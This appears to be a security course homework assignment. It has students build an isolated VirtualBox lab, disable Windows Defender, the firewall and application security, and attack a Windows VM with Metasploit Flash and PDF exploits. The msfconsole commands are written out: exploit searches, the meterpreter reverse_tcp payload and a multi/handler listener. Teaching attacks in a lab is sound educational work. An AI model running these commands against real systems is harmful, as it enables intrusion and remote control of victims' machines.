VM Setup, Virtual Networking, Traffic Capture
by
HW01: VM Setup, Virtual Networking, Traffic Capture
For this homework assignment, you will be expected to build and run an “attack lab” similar to that demonstrated during the Week 1 & 2 lecture sets.
As your assignment submission, you will draft a report that describes the steps taken and, where necessary, the findings that were discovered, and any artifacts.
For this lab, you should use either of the following networking approaches for your lab VMs:
- Host-Only Networking
- Internal networking (with a common network name)
Feel free to use NAT in order to get something from the Internet onto your VM, just remember to configure it back to one of the above isolated networking methods before executing an attack.
You will need at least two Virtual Machines running:
- Kali (the VM I distributed for class)
- Windows (you pick the version)
This assignment will involve identifying exploits and directing an attack against Windows VMs, via a Browser-based Adobe Flash exploit as well as a PDF-based exploit. You will select the exploits you wish to use. Note that you may need to experiment with different versions of Windows and applications to achieve success. You may also end up picking a different exploit after initial tries fail. Also, you may find that you cannot use the same version of Windows for both attacks. In this case, feel free to use different versions of Windows for the attacks.
Establish communicating VMs
Configure both of your VMs to run on the same network. You will either need to configure the DHCP server for VirtualBox’s Host-Only networking, or alternately you may use static IP address assignment.
- Document the process and settings that you used, both inside the VirtualBox application as well as the Guest OS’s.
- Devise a method to confirm connectivity (that the two VMs can talk to one another), demonstrate this and document your experience, findings, and how connectivity is confirmed
- If not accomplished in the prior step, demonstrate that you can communicate between the two using a TCP connection
If you end up having different Windows VMs for your different exploits, then document both of the configurations here. This is the only way I will be able to attempt to recreate your steps.
Unsecuring your VMs
You will need to render your Windows VMs and the applications within them insecure. Some of this was demonstrated in-class, but it is left as an exercise to the students that you make similar configuration changes to any applications and OSes used in this assignment.
- Make sure Windows Defender is disabled How-To Here
- Disable Windows Firewall, as demonstrated in class
- For Internet Explorer and/or FireFox, you will want to modify the security settings to reduce the security level and disable any “sandbox” features that may be implemented
- For Acrobat Reader, you’ll want to use the settings dialog to change the policy and have the application allow all actions and disable security
Launch attack using Flash browser exploit
Choose a Flash exploit to use for launching an attack against a Windows VM. Document how you configured it.
The following command can be run in msfconsole to identify Adobe Flash exploits:
search type:exploit platform:windows adobe_flash
Make sure that you are using the meterpreter reverse shell payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.
Document the steps taken to build your attack.
Extract the files used in your attack (HTML, SWF, etc.), document basic information about them (file sizes, names, URL names, etc.).
You may need to use wireshark, tcpdump and/or tcpflow to extract these files from an active download:
Launch attack using PDF exploit
Choose a PDF exploit to use for launching an attack against a Windows VM. Document how you configured it.
The following command can be run in msfconsole to identify Adobe Acrobat reader exploits:
search type:exploit platform:windows acrobat
Make sure that you are using the meterpreter reverse shell payload:
set PAYLOAD windows/meterpreter/reverse_tcp
Don’t forget to set your LHOST option, as well as any others, correctly, such as SRVHOST and URIPATH.
Document the steps taken to build your attack.
Listening for incoming shells
You may run into a situation where Metasploit isn’t actively listening for connections when some PDFs are generated. In this situation, it is necessary to start up the Meterpreter listener yourself:
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST (your kali IP)
run
You’ll see a message like the one below, telling you it is working:
[*] Started reverse TCP handler on 192.168.56.101:4444
For both attacks
- Document the steps taken to reduce the security levels on the VM(s) and applications
- Document which modules were employed in metasploit, and the metasploit commands used to set up the attack
- Extract the files used in your attack (HTML, SWF, etc.)
- Document basic information about them (file sizes, names, URL names (where appropriate), etc.).
- Use tcpdump, wireshark, or similar tool to capture the network traffic of the attack (pcap file)
Execute a few commands in Meterpreter. What do they return? What is their purpose? Can you upload and download files from the compromised system? Can you execute programs?
You may need to use wireshark, tcpdump and/or tcpflow to extract these files from an active download:
Submit your report to the appropriate HW assignment on Blackboard. If you have any supporting program files or artifacts, ZIP them up into a ZIP archive and upload that to blackboard as well. However, upload your finished report unzipped as its own file, so the in-blackboard viewer works to display it.
tags: malware assignment